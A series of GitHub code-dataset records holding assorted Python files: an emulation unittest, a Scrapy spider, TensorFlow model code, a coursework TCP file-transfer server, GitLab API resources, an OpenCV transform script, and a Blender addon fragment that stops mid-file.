\n (55, 56, 'unload')], \n [(2, 2, 'setup'),\n (2, 7, 'p'),\n (10, 15, 'p'), \n (18, 23, 'p'),\n (26, 31, 'p'),\n (34, 39, 'p'),\n (42, 47, 'p'),\n (50, 55, 'p')]]\n\nEXP_RESULT_PRODUCT = [(1, [], [(0, 'source1'), (0, 'trans'), (2, 'assy_space'), (7, 'trans'), (8, 'sink')], 0, 56), \n (2, [], [(0, 'source1'), (8, 'trans'), (10, 'assy_space'), (15, 'trans'), (16, 'sink')], 0, 56), \n (3, [], [(0, 'source1'), (16, 'trans'), (18, 'assy_space'), (23, 'trans'), (24, 'sink')], 0, 56), \n (4, [], [(0, 'source1'), (24, 'trans'), (26, 'assy_space'), (31, 'trans'), (32, 'sink')], 0, 56), \n (5, [], [(0, 'source1'), (32, 'trans'), (34, 'assy_space'), (39, 'trans'), (40, 'sink')], 0, 56), \n (6, [], [(0, 'source1'), (40, 'trans'), (42, 'assy_space'), (47, 'trans'), (48, 'sink')], 0, 56), \n (7, [], [(0, 'source1'), (48, 'trans'), (50, 'assy_space'), (55, 'trans'), (56, 'sink')], 0, 56), \n (8, [], [(0, 'source2'), (2, 'assy_space'), (7, 'trans'), (8, 'sink')], 0, 56), \n (9, [], [(0, 'source2'), (10, 'assy_space'), (15, 'trans'), (16, 'sink')], 0, 56), \n (10, [], [(0, 'source2'), (18, 'assy_space'), (23, 'trans'), (24, 'sink')], 0, 56), \n (11, [], [(0, 'source2'), (26, 'assy_space'), (31, 'trans'), (32, 'sink')], 0, 56), \n (12, [], [(0, 'source2'), (34, 'assy_space'), (39, 'trans'), (40, 'sink')], 0, 56), \n (13, [], [(0, 'source2'), (42, 'assy_space'), (47, 'trans'), (48, 'sink')], 0, 56), \n (14, [], [(0, 'source2'), (50, 'assy_space'), (55, 'trans'), (56, 'sink')], 0, 56)]\n\nEMULATE_UNTIL = 100;\n\n\nclass ControlCreate(emulation.Process):\n def run(self, model):\n create1 = model.modules[\"create1\"]\n create2 = model.modules[\"create2\"]\n rp_crea1 = create1.create_report_socket()\n rp_crea2 = create2.create_report_socket()\n dates1 = [0, 1, 3, 7, 12, 20, 30]\n requests1 = [emulation.Request(\"create1\", \"create\",params={'productType':'type1', 'date': d}) for d in dates1]\n dates2 = [5, 6, 7, 9, 11, 23, 35]\n requests2 = [emulation.Request(\"create2\", \"create\",params={'productType':'type1', 'date': d}) for d in dates2]\n yield emulation.put, self, create1.request_socket, requests1\n yield emulation.get, self, rp_crea1, 7\n yield emulation.put, self, create2.request_socket, requests2\n yield emulation.get, self, rp_crea2, 7\n\nclass ControlAssy(emulation.Process):\n def run(self, model):\n trans = model.modules[\"trans\"]\n assy = model.modules[\"assy\"]\n rp_assy = assy.create_report_socket()\n obs1 = model.modules[\"obs_source1\"]\n obs2 = model.modules[\"obs_source2\"]\n rp_obs1 = obs1.create_report_socket()\n rp_obs2 = obs2.create_report_socket()\n obs_assy = model.modules[\"obs_assy\"]\n rp_obs_assy = obs_assy.create_report_socket()\n while True:\n ##attente de l'arrivée d'un pièce\n logger.info(\"attente d'une piece\")\n yield emulation.get, self, rp_obs1, 1\n logger.info(\"pce 1 prete\")\n ev = self.got[0]\n logger.info(\"chargement\")\n rq = emulation.Request(\"trans\",\"move\",params={'program':'load'})\n yield emulation.put, self, trans.request_socket, [rq]\n ##pièces prêtes\n yield emulation.get, self, rp_obs2, 1\n logger.info(\"pce 2 prete\")\n yield emulation.get, self, rp_obs_assy, 1\n logger.info(\"pce assy chargée\")\n #print self.got[0]\n #yield emulation.put, self, assy.request_socket, [emulation.Request(\"assy\",\"setup\", params={\"program\":'p'})]\n ##début process\n logger.info(\"process\")\n yield emulation.put, self, assy.request_socket, [emulation.Request(\"assy\",\"assy\", params={\"program\":'p'})]\n ##attente fin process\n fin = False\n while not fin:\n yield emulation.get, self, rp_assy, 1\n logger.info(self.got[0])\n fin = self.got[0].what==\"idle\"\n ##déchargement\n logger.info(\"dechargement\")\n yield emulation.put, self, trans.request_socket, [emulation.Request(\"trans\", \"move\", params={\"program\": 'unload'})]\n\ndef get_model():\n model = emulation.Model()\n source1 = emulation.Holder(model, \"source1\")\n obs_source1 = emulation.PushObserver(model, \"obs_source1\", holder = source1)\n source2 = emulation.Holder(model, \"source2\")\n obs_source2 = emulation.PushObserver(model, \"obs_source2\", holder = source2)\n create1 = emulation.CreateAct(model, \"create1\", destination = source1)\n create2 = emulation.CreateAct(model, \"create2\", destination = source2)\n assy_space = emulation.Holder(model, \"assy_space\")\n obs_assy = emulation.PushObserver(model, \"obs_assy\", holder = assy_space)\n assy = emulation.AssembleAct(model, \"assy\", assy_holder = assy_space)\n trans = emulation.SpaceAct(model, \"trans\")\n sink = emulation.Holder(model, \"sink\")\n obs_sink = emulation.PushObserver(model, \"obs_sink\", holder = sink)\n trans.add_program('load', 2, {'source':source1, 'destination':assy_space})\n trans.add_program('unload', 1, {'source':assy_space, 'destination':sink})\n assy.add_program('p', 5, {'source':source2})\n model.register_control(ControlCreate)\n model.register_control(ControlAssy)\n return model\n\n\nclass TestSim10(unittest.TestCase):\n \n def test_ModelCreate(self):\n get_model()\n\n def test_Start(self):\n model = get_model()\n model.emulate(until = EMULATE_UNTIL)\n\n def test_RunResults(self):\n model = get_model()\n model.emulate(until = EMULATE_UNTIL)\n result_product = [(pid, \n p.shape_history, \n p.space_history, \n p.create_time, \n p.dispose_time) for (pid, p) in model.products.items()]\n result_resource = [model.modules[\"trans\"].trace, model.modules[\"assy\"].trace]\n self.assertEqual(result_product, EXP_RESULT_PRODUCT)\n self.assertEqual(result_resource, EXP_RESULT_RESOURCE)\n\n\nif __name__ == '__main__': \n unittest.main()\n","repo_name":"remipannequin/emulica","sub_path":"tests/test_sim10.py","file_name":"test_sim10.py","file_ext":"py","file_size_in_byte":7955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"33826897491","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom dsp.items import DspItem\nimport copy\n\n\nclass DsprolightSpider(scrapy.Spider):\n name = 'dsprolight'\n allowed_domains = ['www.dsprolight.com']\n start_urls = ['http://www.dsprolight.com/new-products.php']\n\n def parse(self, response):\n categorys = response.xpath('//*[@id=\"categories_block_left\"]/ul/li/a')\n\n for cate in categorys:\n item = DspItem()\n item['cateUrl'] = cate.xpath('./@href').extract()[0]\n item['cateLongName'] = cate.xpath('./@title').extract()[0]\n item['cateName'] = cate.xpath('./text()').extract()[0]\n yield scrapy.Request(\"%s?n=100\"%(item['cateUrl']),callback=self.parseProductList,meta={'item':item})\n\n\n def parseProductList(self,response):\n '''\n :type response: scrapy.http.response\n :param response:\n :return:\n '''\n productList = response.xpath(\"//div[@class='products clearfix']/ul/li\")\n for product in productList:\n item = response.meta[\"item\"]\n item['productUrl'] = product.xpath(\"./a/@href\").extract()[0]\n item['productName'] = product.xpath(\"./a/@title\").extract()[0]\n item['productImg'] = product.xpath(\"./a/img/@src\").extract()[0]\n yield scrapy.Request(\"%s\" % (item['productUrl']), callback=self.parseProductInfo, meta={'item': copy.deepcopy(item)})\n\n def parseProductInfo(self,response):\n '''\n :type response: scrapy.http.response\n :param response:\n :return:\n '''\n item = response.meta[\"item\"]\n item['productImgList'] = response.xpath(\"//ul[@id='thumbs_list_frame']/li/a/@href\").extract()\n item['productImg'] = response.xpath(\"//img[@id='bigpic']/@src\").extract()[0]\n item['productInfo'] = response.xpath(\"//div[@class='more_info_block clearfix']\")[0].extract()\n yield item\n\n\n\n","repo_name":"hezhenke/scrapy-dsprolight","sub_path":"dsp/spiders/dsprolight.py","file_name":"dsprolight.py","file_ext":"py","file_size_in_byte":1908,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"79"} +{"seq_id":"2483345599","text":"from . import Likelihood\nimport tensorflow as tf\nimport numpy as np\nimport math\nfrom .. import util\nfrom .. import debugger\nfrom .. sparsity import StandardSparsity\n\nclass SingleGPLikelihood(Likelihood):\n def __init__(self, context, r):\n self.context = context\n self.r = r\n\n def setup_standard(self):\n self.num_train = self.data.get_num_training(source=self.r)\n self.batch_size = self.data.get_batch_size(source=self.r)\n self.num_latent = self.context.num_latent\n self.num_outputs = self.context.num_outputs\n self.num_weights = self.context.num_weights\n self.num_inducing = self.data.get_num_inducing(source=self.r)\n self.kern_f = self.context.kern_f\n self.use_diag_covar_flag = self.context.use_diag_covar_flag\n self.jitter=self.context.jitter\n\n self.x_train = self.data.get_placeholder(source=self.r, var='x')\n self.y_train = self.data.get_placeholder(source=self.r, var='y')\n self.y_train_nans = self.data.get_placeholder(source=self.r, var='y_nan')\n\n #=====Components for q(u,v) as an MoG\n self.q_num_components = self.context.num_components\n self.num_sigma = self.num_inducing*(self.num_inducing+1)/2\n \n self.parameters = self.context.parameters\n\n self.get_standard_variables()\n self.sparsity = StandardSparsity(self.data, self.context)\n\n def setup(self, data):\n self.data = data\n self.setup_standard()\n\n def get_standard_variables(self):\n self.q_means_u = self.parameters.get(name='q_means_u_0')\n self.q_covars_u = self.parameters.get(name='q_covars_u_0')\n\n self.q_weights = self.parameters.get(name='q_weights')\n\n self.sigma_y = self.parameters.get(name='noise_sigma_0')\n self.sigma_f = self.parameters.get(name='f_sigma')\n\n self.inducing_locations = self.parameters.get(name='inducing_locations_0')\n\n\n def build_graph(self):\n lik = self._build_log_likelihood()\n return lik\n\n def _build_log_likelihood(self):\n total_sum = 0.0\n\n c1 = 0\n P = self.num_outputs\n\n get_sigma = lambda sig : tf.square(util.var_postive(sig))\n\n p = 0\n for k in range(self.q_num_components):\n pi_k = self.q_weights[k]\n n_p = tf.count_nonzero(self.y_train_nans[:,p])\n c1 -= pi_k * (tf.to_float(n_p)/2)*util.safe_log(2*np.pi*get_sigma(self.sigma_y[p]))\n total_sum = tf.Print(total_sum, [get_sigma(self.sigma_y[p])], 'sig^2')\n\n for k in range(self.q_num_components):\n pi_k = self.q_weights[k]\n _mu_f, _sigma_f, _, _ = self.sparsity._build_intermediate_conditionals(k, self.r, self.x_train)\n\n c2 = -(1/(2*get_sigma(self.sigma_y[p])))\n #c2 = tf.clip_by_value(c2, -1e20, 1e20)\n\n nan_mask = tf.cast(self.y_train_nans[:,p], dtype=tf.bool)\n y_p = tf.boolean_mask(mask=nan_mask, tensor=self.y_train[:,p])\n\n #sample the X where we have data\n sample_diag = lambda t: tf.boolean_mask(mask=nan_mask, tensor=t, axis=1)\n #sample_diag = lambda t: t\n\n mu_f = sample_diag(_mu_f[:, :, 0])\n\n f = mu_f\n\n err = y_p - tf.squeeze(f)\n err = tf.reduce_sum(tf.square(err), axis=0)\n\n total_sum += c2*pi_k*err\n\n return c1+total_sum\n","repo_name":"ohamelijnck/multi_res_gps","sub_path":"src/_gprn/likelihoods/single_gp_likelihood.py","file_name":"single_gp_likelihood.py","file_ext":"py","file_size_in_byte":3372,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"79"} +{"seq_id":"70885430977","text":"class Stack():\n \"\"\"Implementation of stack data structure\"\"\"\n\n def __init__(self):\n \"\"\"Initiate stack list and length\"\"\"\n self.stack = []\n self.length = 0\n\n def pop(self):\n \"\"\"pop the last element in the stack\"\"\"\n if self.length == 0:\n return \"stack is empty\"\n\n self.length -= 1\n return self.stack.pop()\n\n def push(self, data):\n\n self.stack.append(data)\n self.length += 1\n\n def peek(self):\n if self.length == 0:\n return \"stack is empty\"\n return self.stack[self.length - 1]\n\n\nstack = Stack()\nassert stack.pop() == \"stack is empty\"\nstack.push(3)\nstack.push(4)\nstack.push(5)\nstack.pop()\nstack.peek()\n\n","repo_name":"akinpelu746/Data-Structure-and-Algorithm-in-python","sub_path":"src/DataStructure/Stack.py","file_name":"Stack.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"24570082781","text":"import socket as sc\r\nfrom sys import argv\r\nimport os\r\nimport re\r\n\r\n\r\n# ALL RESOURCES (For the entire assignment)\r\n# https://docs.python.org/3.7/library/socket.html\r\n# https://stackoverflow.com/questions/15909064/python-implementation-for-stop-and-wait-algorithm\r\n# https://github.com/mj2266/stop-and-wait-protocol\r\n# https://pymotw.com/3/socket/udp.html\r\n# https://www.youtube.com/watch?v=3QiPPX-KeSc&t=2195s&ab_channel=TechWithTim\r\n# https://dev.to/black_strok3/difference-between-udp-and-tcp-example-code-1pg1\r\n# https://wiki.python.org/moin/UdpCommunication\r\n# https://github.com/DNofulla/Battleship-Game/blob/master/Battleship4.c (My own implementation in C for my ICSI 333 class game assignment)\r\n# https://stackoverflow.com/questions/6380057/python-binding-socket-address-already-in-use\r\n# https://github.com/nikhilroxtomar/Large-File-Transfer-using-TCP-Socket-in-Python3\r\n\r\n\r\n\"\"\"server_tcp.py: TCP Implementation of a server socket\"\"\"\r\n\r\n__author__ = \"Daniel Nofulla\"\r\n__version__ = \"1.0.0\"\r\n__email__ = \"dnofulla@albany.edu\"\r\n\r\n\r\n\"\"\"Main Function\r\n\r\nThis function runs the python program!\r\n\"\"\"\r\n\r\n\r\ndef main():\r\n\r\n if len(argv) != 2:\r\n print(\r\n \"Number of command line arguments MUST be 2. The python file name and the port\")\r\n print(\"Example:\")\r\n print(\"python3 server_tcp.py \")\r\n exit(1)\r\n\r\n \"\"\"Server starts and listens for clients\r\n\r\n To run this TCP Server, make sure to use python3 and\r\n run it like this:\r\n\r\n python3 server_tcp.py \r\n \"\"\"\r\n\r\n server = None\r\n address = None\r\n\r\n flag = True\r\n while flag:\r\n\r\n \"\"\"Setting up socket\r\n\r\n If the server or address variable are equal to None, that means\r\n that the client had either disconnected or that the server had \r\n just started. If that condition is met, then a new server TCP\r\n socket will be initialized and will listen and wait to accept \r\n clients.\r\n \"\"\"\r\n\r\n if server == None or address == None:\r\n print(\"Server is starting...\")\r\n server = sc.socket(sc.AF_INET, sc.SOCK_STREAM)\r\n server.setsockopt(sc.SOL_SOCKET, sc.SO_REUSEADDR, 1)\r\n server.bind(('', int(argv[1])))\r\n server.listen()\r\n print(\"Server is listening...\")\r\n server, address = server.accept()\r\n print(f\"Client {address} connected!\")\r\n\r\n \"\"\"Server Receives input from the Client\r\n\r\n The server receives the client input from the client.\r\n The server receives up to 1024 bytes of input. The server\r\n then converts that client input to an argument array, for easy\r\n access to each argument in the client input.\r\n \"\"\"\r\n client_input = server.recv(1024).decode(\"utf-8\")\r\n print(f\"Client entered command: {client_input}\")\r\n arguments = client_input.split()\r\n server.send(\"Confirm\".encode(\"utf-8\"))\r\n\r\n if len(arguments) > 3 or len(arguments) < 1:\r\n arguments[0] = \"Invalid number of arguments\"\r\n\r\n if arguments[0].upper() == 'PUT':\r\n\r\n \"\"\"PUT COMMAND\r\n\r\n This Command is used like this:\r\n\r\n PUT \r\n\r\n When the put command is received, the server sends\r\n a response to the client that it received the file name\r\n and size (from the command arguments). Then the server proceeds\r\n to receive the file data with with a buffer the size. After the server receives the data, it\r\n writes the data to the file, successfully completing the upload.\r\n The server then lets the client know that the file was uploaded.\r\n \"\"\"\r\n\r\n if len(arguments) != 2:\r\n print(\"Incorrect number of arguments\")\r\n print(\"How to execute a PUT command:\")\r\n print(\"PUT \")\r\n else:\r\n print(f\"Client uploading file {arguments[1]}...\")\r\n file = open(arguments[1], \"w+\")\r\n size = int(server.recv(1024).decode(\"utf-8\"))\r\n print(f\"Receiving the file data...\")\r\n server.send(\"Confirm\".encode(\"utf-8\"))\r\n\r\n while size:\r\n data = server.recv(1000)\r\n data = data.decode(\"utf-8\")\r\n file.write(data)\r\n server.send(\"Confirm\".encode(\"utf-8\"))\r\n\r\n if len(data) < 1000 and size % 1000 != 0:\r\n break\r\n\r\n server.recv(1024).decode(\"utf-8\")\r\n\r\n file.close()\r\n print(f\"Received and Wrote file data for {arguments[1]}\")\r\n server.send(\"File uploaded.\".encode(\"utf-8\"))\r\n\r\n elif arguments[0].upper() == \"GET\":\r\n\r\n \"\"\"GET COMMAND\r\n\r\n This Command is used like this:\r\n\r\n GET \r\n\r\n The Server first opens the file being requested, then\r\n sends the size of the file to the client, and then proceeds\r\n to read the data and send it to the client. After that\r\n it sends a message to the client that says that the file\r\n has been downloaded.\r\n \"\"\"\r\n\r\n if len(arguments) != 2:\r\n print(\"Incorrect number of arguments\")\r\n print(\"How to execute a GET command:\")\r\n print(\"GET \")\r\n else:\r\n print(f\"Client downloading file {arguments[1]}...\")\r\n file = open(arguments[1], \"r\")\r\n server.recv(1024).decode(\"utf-8\")\r\n print(\"Sending file size to the client...\")\r\n server.send(str(os.path.getsize(arguments[1])).encode(\"utf-8\"))\r\n print(f\"Sent file data for {arguments[1]}\")\r\n server.recv(1024).decode(\"utf-8\")\r\n data = file.read()\r\n print(\"Sending file data to the client...\")\r\n server.send(data.encode(\"utf-8\"))\r\n server.recv(1024).decode(\"utf-8\")\r\n print(\"Sent file data to the client!\")\r\n\r\n file.close()\r\n\r\n server.send((\"File %s downloaded.\" %\r\n arguments[1]).encode(\"utf-8\"))\r\n server.recv(1024).decode(\"utf-8\")\r\n\r\n elif arguments[0].upper() == \"KEYWORD\":\r\n\r\n \"\"\"KEYWORD COMMAND\r\n\r\n This Command is used like this:\r\n\r\n KEYWORD \r\n\r\n The server opens the file to be anonymized and creates a name with\r\n the same name but with a '_anon.txt' ending instead of just '.txt'.\r\n In the anonymization output file, we copy the data from the original\r\n file to the anonymization output file, but we replace any occurrence\r\n the keyword_to_be_anonymized in the file, with 'X's.\r\n For example, the word 'Project' would turn into 'XXXXXXX'.\r\n \"\"\"\r\n\r\n if len(arguments) != 3:\r\n print(\"Incorrect number of arguments\")\r\n print(\"How to execute a KEYWORD command:\")\r\n print(\"KEYWORD \")\r\n else:\r\n print(\r\n f\"Client anonymizing file {arguments[2]} with keyword {arguments[1]}...\")\r\n\r\n old_name = arguments[2]\r\n print(\"Opening files...\")\r\n file = open(arguments[2], \"r\")\r\n new_name = arguments[2].replace(\".txt\", \"_anon.txt\")\r\n new_file = open(new_name, \"w+\")\r\n print(\"Anonymizing and Writing file...\")\r\n\r\n new_file.write(re.compile(re.escape(arguments[1]), re.IGNORECASE).sub(\r\n \"X\" * len(arguments[1]), file.read()))\r\n\r\n file.close()\r\n new_file.close()\r\n server.recv(1024).decode(\"utf-8\")\r\n print(\r\n f\"File {old_name} anonymized. Output file is {new_name}!\")\r\n server.send((\"File %s anonymized. Output file is %s\" %\r\n (old_name, new_name)).encode(\"utf-8\"))\r\n\r\n elif arguments[0].upper() == \"QUIT\":\r\n\r\n \"\"\"QUIT COMMAND\r\n\r\n This Command is used like this:\r\n\r\n QUIT \r\n\r\n The server simply prints out that the client has disconnected.\r\n \"\"\"\r\n\r\n if len(arguments) != 1:\r\n print(\"Incorrect number of arguments\")\r\n print(\"How to execute a QUIT command:\")\r\n print(\"QUIT\")\r\n else:\r\n print(f\"Client {address} disconnected from the server!\")\r\n address = None\r\n server.close()\r\n server = None\r\n\r\n else:\r\n\r\n \"\"\"Failed Commands\r\n\r\n Failed commands are commands that are not listed above.\r\n These commands will be ignored by the server and just simply\r\n go to the next request iteration in the loop.\r\n \"\"\"\r\n\r\n print(f\"{arguments[0]}\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"DNofulla/icsi_416_project_1","sub_path":"server/server_tcp.py","file_name":"server_tcp.py","file_ext":"py","file_size_in_byte":9134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"1995169687","text":"import cv2\nimport numpy as np\nimport time\n\n# Load the input image.\nimg = cv2.imread('HW1_Q3.png')\n\n# Define a scaling factor and number of frames.\nscale_factor = 0.5\nnum_frames = 10\n\n# Get the width and height of the frame and resize the image to match with it.\nheight, width, _ = img.shape\nnew_width = int(width * scale_factor)\nnew_height = int(height * scale_factor)\nimg = cv2.resize(img, (new_width, new_height))\n\n# Define the transformation matrices for translations, scales, rotations, and shears.\ntranslation_matrix = np.float32([[1, 0, -160], [0, 1, -160]])\nscale_matrix = np.float32([[0.5, 0, 0], [0, 0.5, 0]])\nrotation_matrix = cv2.getRotationMatrix2D((new_width / 2, new_height / 2), -50, 1)\nshear_matrix = np.float32([[1, 0.2, 0], [0, 1, 0]])\n\n# Define an array of matrices.\ntransformation_matrices = [translation_matrix, scale_matrix, rotation_matrix, shear_matrix]\n\n# Define an empty array to store the final output.\nout_frames = []\n\n# Loop through each frame and generate the images.\nfor i in range(num_frames):\n\n # Create a copy of the original image.\n img_copy = img.copy()\n\n # Loop through each transformation matrix and apply it to the copy of the original image.\n for matrix in transformation_matrices:\n img_copy = cv2.warpAffine(img_copy, matrix, (new_width, new_height))\n\n # Concatenate the original image with the transformed image and store it in the final array.\n out_frame = np.concatenate((img, cv2.flip(img_copy, 1)), axis=1)\n out_frames.append(out_frame)\n\n # Wait for a second before generating the next frame.\n time.sleep(1)\n\n# Combine the frames to create a video.\nfourcc = cv2.VideoWriter_fourcc(*'mp4v')\nvideo = cv2.VideoWriter('output.mp4', fourcc, 10, (2 * new_width, new_height))\nfor frame in out_frames:\n video.write(frame)\n\n# Release the video writer and delete the temporary image files.\nvideo.release()\ncv2.destroyAllWindows()\n","repo_name":"Pouya-Ta/Image-processing-Projects","sub_path":"week 1/Q2.py","file_name":"Q2.py","file_ext":"py","file_size_in_byte":1903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"42209763325","text":"# on raspberry\nimport socket\nfrom time import sleep\n\ncomputer_name = \"CYBERSPACE.local\"\nport = 1992\n\naddr = (computer_name,port)\n\ndef hibernate_server(inifinite):\n while True:\n try:\n s = socket.create_connection(addr,timeout=1)\n s.send(b\"hibernate\")\n return\n except Exception as e:\n print(e)\n if not inifinite:\n return\nif __name__ == \"__main__\":\n hibernate_server(True)\n","repo_name":"cobrce/RaspberryPi-Shutdown","sub_path":"RaspberrypiClient_(python)/hibernate_server.py","file_name":"hibernate_server.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"24153442130","text":"import sys\nsys.path.append('..')\nfrom flask_restful import Resource\nfrom flask import jsonify, abort, request\nimport gitlab\nfrom gitlab.exceptions import GitlabAuthenticationError\nfrom auth import repo_url\n\n\n# Get a single project by ID\nclass Project(Resource):\n \"\"\"\n Project represents an API resource for projects on gitlab.\n \"\"\"\n def get(self, id):\n \"\"\"\n Get a project and it's associated details from gitlab.\n :param id: the id of the gitlab project to retrieve\n :return: the project.\n \"\"\"\n\n if 'Private-Token' not in request.headers:\n abort(401, 'User Unauthorized')\n\n token = request.headers['Private-Token']\n\n try:\n\n with gitlab.Gitlab(repo_url, ssl_verify=False, private_token=token) as gl:\n project = gl.projects.get(id)\n\n except GitlabAuthenticationError as error:\n abort(401, 'User Unauthorized.')\n\n return jsonify({\"project\": project.attributes})\n\n# Get all existing projects.\nclass AllProjects(Resource):\n \"\"\"\n AllProjects represents an API resource for all projects on gitlab.\n \"\"\"\n def get(self):\n \"\"\"\n Get all projects from gitlab the current user is allowed to view.\n :return: the list of projects the user can see.\n \"\"\"\n\n if 'Private-Token' not in request.headers:\n abort(401, 'User Unauthorized')\n\n token = request.headers['Private-Token']\n\n try:\n\n with gitlab.Gitlab(repo_url, ssl_verify=False, private_token=token) as gl:\n projects = gl.projects.get()\n projectList = [project.attributes for project in projects]\n\n except GitlabAuthenticationError as error:\n abort(401, 'User Unauthorized.')\n\n return jsonify({\"Projects\": projectList})\n\n# Get a List of all projects by a user.\nclass Project_List(Resource):\n \"\"\"\n ProjectList represents an API resource for all projects associated\n with the current user.\n \"\"\"\n def get(self):\n \"\"\"\n Get all projects from gitlab associated with the current user.\n :return: a list of the current user's gitlab projects\n \"\"\"\n\n if 'Private-Token' not in request.headers:\n abort(401, 'User Unauthorized')\n\n token = request.headers['Private-Token']\n\n try:\n\n with gitlab.Gitlab(repo_url, ssl_verify=False, private_token=token) as gl:\n \n projects = gl.projects.list(owned=True)\n projectList = [project.attributes for project in projects]\n\n except GitlabAuthenticationError as error:\n abort(401, 'User Unauthorized.')\n\n return jsonify({\"Projects\": projectList})","repo_name":"awagsta/asset-management","sub_path":"resources/projects.py","file_name":"projects.py","file_ext":"py","file_size_in_byte":2728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"26470019111","text":"#from __future__ import print_function\nimport tensorflow as tf\nimport numpy as np \n \nclass SpectralSubSampler:\n def __init__(self, numMSBands, listOfLambda, listOfCenterMin=None, listOfCenterMax=None, listOfFWHMMin=None, listOfFWHMMax=None):\n self.numMSBands = numMSBands\n self.numHSBands = len(listOfLambda)\n self.listOfLambda = listOfLambda\n self.listOfCenterMin = listOfCenterMin\n self.listOfCenterMax = listOfCenterMax\n self.listOfFWHMMin = listOfFWHMMin\n self.listOfFWHMMax = listOfFWHMMax\n\n def __call__(self, x): \n initValueForSigmoid=4\n defaultMSMinFWHM = 5 * (np.max(self.listOfLambda)-np.min(self.listOfLambda))/len(self.listOfLambda)\n b = 3 #guard gap parameter \n\n lambdaSteps = tf.constant(np.array(self.listOfLambda, dtype=np.float32).reshape((self.numHSBands,1)))\n if self.listOfCenterMin is not None:\n centerMin = tf.constant(np.array(self.listOfCenterMin, dtype=np.float32).reshape((1,self.numMSBands)))\n else:\n centerMin = tf.constant(np.array([np.min(self.listOfLambda)]*self.numMSBands, dtype=np.float32).reshape((1,self.numMSBands)))\n if self.listOfCenterMax is not None:\n centerMax = tf.constant(np.array(self.listOfCenterMax, dtype=np.float32).reshape((1,self.numMSBands)))\n else:\n centerMax = tf.constant(np.array([np.max(self.listOfLambda)]*self.numMSBands, dtype=np.float32).reshape((1,self.numMSBands)))\n if self.listOfFWHMMin is not None:\n FWHMMin = tf.constant(np.array(self.listOfFWHMMin, dtype=np.float32).reshape((1,self.numMSBands)))\n else:\n FWHMMin = tf.constant(np.array([defaultMSMinFWHM]*self.numMSBands, dtype=np.float32).reshape((1,self.numMSBands)))\n if self.listOfFWHMMax is not None:\n FWHMMax = tf.constant(np.array(self.listOfFWHMMax, dtype=np.float32).reshape((1,self.numMSBands)))\n\n\n mu0 = tf.get_variable(\"mu0\", shape=[1,self.numMSBands],initializer=tf.random_uniform_initializer(minval=-initValueForSigmoid,maxval=initValueForSigmoid))\n \n if self.listOfFWHMMax is not None:\n sigma0 = tf.get_variable(\"sigma0\", shape=[1,self.numMSBands],initializer=tf.random_uniform_initializer(minval=-initValueForSigmoid,maxval=initValueForSigmoid))\n else:\n sigma0 = tf.get_variable(\"sigma0\", shape=[1,self.numMSBands],initializer=tf.random_uniform_initializer(minval=0,maxval=(np.max(self.listOfLambda)-np.min(self.listOfLambda))/6))\n\n if self.listOfFWHMMax is not None:\n sigma = FWHMMin/2.355+tf.nn.sigmoid(sigma0)*(FWHMMax/2.355-FWHMMin/2.355)\n else:\n sigma = FWHMMin/2.355+tf.abs(sigma0)\n \n mu = (centerMin+b*sigma)+tf.nn.sigmoid(mu0)*(centerMax-centerMin-2*b*sigma)\n \n z_2 = tf.div(tf.square(lambdaSteps-mu),2*tf.square(sigma)) \n Z = tf.sqrt(2*np.pi*tf.square(sigma))\n Kmulti = tf.exp(-z_2) / Z\n \n y = tf.matmul(x, Kmulti) \n\n self.mu0 = mu0\n self.sigma0 = sigma0\n self.mu = mu\n self.sigma = sigma\n return y\n \n def get_parameters(self):\n return [self.mu0, self.sigma0]\n \n def get_bands(self):\n return [self.mu, 2.355*self.sigma]\n\n","repo_name":"UBGewali/optimized-spectral-superresolution","sub_path":"code/SpectralSubSampler.py","file_name":"SpectralSubSampler.py","file_ext":"py","file_size_in_byte":3295,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"79"} +{"seq_id":"19886816987","text":"import bpy\nimport bmesh\nfrom logging import getLogger\n\nlogger = getLogger(__name__)\n\n\ndef get_selected_index(bm: bmesh.types.BMesh):\n selected = [v.index for v in bm.verts if v.select is True]\n return selected\n\n\n# 選択頂点に含まれる頂点グループを列挙する\ndef get_vertex_groups_from_selected(obj: bpy.types.Object):\n if isinstance(obj.data, bpy.types.Mesh):\n mesh = obj.data\n # オブジェクトに含まれる頂点グループを取得\n vertex_groups = obj.vertex_groups\n # 選択頂点を取得\n bm = bmesh.from_edit_mesh(obj.data)\n selected_indices = get_selected_index(bm)\n # 選択頂点に含まれる頂点グループインデックスを取得\n # リアルタイムの選択頂点はbmeshからじゃないとうまく行かないっぽいけどvertex groupとかのデータ自体へのアクセスはbpy.dataからのほうがやりやすい\n\n group_indices: list[int] = []\n verts = bm.verts\n bm.verts.layers.deform.verify()\n for i in selected_indices:\n pass\n group_set = set(group_indices)\n names = [vertex_groups[i].name for i in group_set]\n return names\n else:\n return None\n\n\nclass NWC_OT_WeightControl(bpy.types.Operator):\n \"\"\"a\"\"\"\n\n bl_idname = \"mesh.weight_control\"\n bl_label = \"\"\n bl_description = \"operator description\"\n bl_options = {\"REGISTER\", \"UNDO\"}\n\n # メニューを実行したときに呼ばれるメソッド\n def execute(self, context):\n # logging\n logger.debug(\"exec my ops\")\n result = get_vertex_groups_from_selected(context.object)\n # infoにメッセージを通知\n self.report({\"INFO\"}, f\"{result}\")\n # 正常終了ステータスを返す\n return {\"FINISHED\"}\n\n\nclasses = [NWC_OT_WeightControl]\ntools = []\n\n\ndef register():\n for c in classes:\n bpy.utils.register_class(c)\n for t in tools:\n bpy.utils.register_tool(t)\n\n\ndef unregister():\n for c in classes:\n bpy.utils.unregister_class(c)\n for t in tools:\n 